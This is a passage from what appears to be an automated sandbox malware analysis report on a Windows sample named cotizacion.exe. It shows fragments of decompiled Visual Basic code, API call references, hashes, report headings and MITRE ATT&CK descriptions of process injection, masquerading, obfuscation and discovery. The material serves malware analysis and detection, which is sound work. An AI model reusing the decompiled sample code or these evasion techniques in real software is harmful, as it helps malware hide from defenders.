						_push(_v64);
						L00401906();
						_v80 = _t41;
					}
					_v72 = _v40;
					_v40 = _v40 & 0x00000000;
					L00401882();
				}
				_v36 =  *0x401498;
				asm("wait");
				_push(0x414898);
				_t35 =  &_v24;
				_push(_t35);
				_push(0);
				L00401858();
				L00401924();
				return _t35;
			}

0x004147aa
0x004147b5
0x004147b6
0x004147bd
0x004147c0
0x004147c8
0x004147cb
0x004147d5
0x004147d8
0x004147df
0x004147e2
0x004147e3
0x004147ec
0x004147f5
0x0041480f
0x004147f7
0x004147f7
0x004147fc
0x00414801
0x00414806
0x00414806
0x0041481b
0x0041482c
0x0041482f
0x00414831
0x00414838
0x00414851
0x0041483a
0x0041483a
0x0041483c
0x00414841
0x00414844
0x00414847
0x0041484c
0x0041484c
0x00414858
0x0041485b
0x00414865
0x00414865
0x00414870
0x00414873
0x00414874
0x00414884
0x00414887
0x00414888
0x0041488a
0x00414892
0x00414897

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004147C0
#556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004147E3
__vbaNew2.MSVBVM60(004116D4,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414801
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000048,?,?,?,?,00006003), ref: 00414847
__vbaStrMove.MSVBVM60(?,?,?,?,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414865
__vbaAryDestruct.MSVBVM60(00000000,?,00414898,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041488A
__vbaFreeStr.MSVBVM60(00000000,?,00414898,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414892

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$#556CheckChkstkDestructFreeHresultMoveNew2
String ID:
API String ID: 4055419735-0
Opcode ID: c89c14348d9d550d6cf06274603c27b751de6f940f6bde335857dc8c6095a66e
Instruction ID: 3e5ae0331cc6428eb66472419b40244756e1e1e90dc416b128ff961349628e95
Opcode Fuzzy Hash: c89c14348d9d550d6cf06274603c27b751de6f940f6bde335857dc8c6095a66e
Instruction Fuzzy Hash: DF211775D40249EFDB00EF95D945BEEBBB4EF04704F60442AF104B62A0D7B96985CB29

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report cotizacion.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: cotizacion.exe PID: 1976 Parent PID: 5576

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: cotizacion.exe PID: 1976 Parent PID: 5576 cotizacion.exeCOMMON

Execution Graph

Graph

Function 00412574, Relevance: 288.8, APIs: 140, Strings: 24, Instructions: 1783
COMMON

Function 00416DF9, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 186
COMMON

Function 00414E28, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 135
COMMON

Function 00414C28, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55
COMMON

Function 004154FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Function 00401968, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 1040
COMMON

Function 00411250, Relevance: .0, Instructions: 8
COMMON

Function 00411478, Relevance: .0, Instructions: 8
COMMON

Function 00411508, Relevance: .0, Instructions: 8
COMMON

Function 00411290, Relevance: .0, Instructions: 8
COMMON

Function 00415993, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 236
COMMON

Function 00416365, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 148
COMMON

Function 00416B2E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 177
COMMON

Function 00415287, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 181
COMMON

Function 00416895, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 178
COMMON

Function 00414A17, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 140
COMMON

Function 004170AC, Relevance: 27.2, APIs: 18, Instructions: 171
COMMON

Function 004155F9, Relevance: 25.7, APIs: 17, Instructions: 158
COMMON

Function 004160F5, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 150
COMMON

Function 004165FA, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96
COMMON

Function 00415868, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79
COMMON

Function 00415E06, Relevance: 19.6, APIs: 13, Instructions: 110
COMMON

Function 0041508B, Relevance: 18.1, APIs: 12, Instructions: 120
COMMON

Function 00414D0B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
COMMON

Function 0041463A, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Function 004148B3, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Function 00416776, Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Function 00415F96, Relevance: 10.6, APIs: 7, Instructions: 84
COMMON

Function 004147A5, Relevance: 10.6, APIs: 7, Instructions: 72
COMMON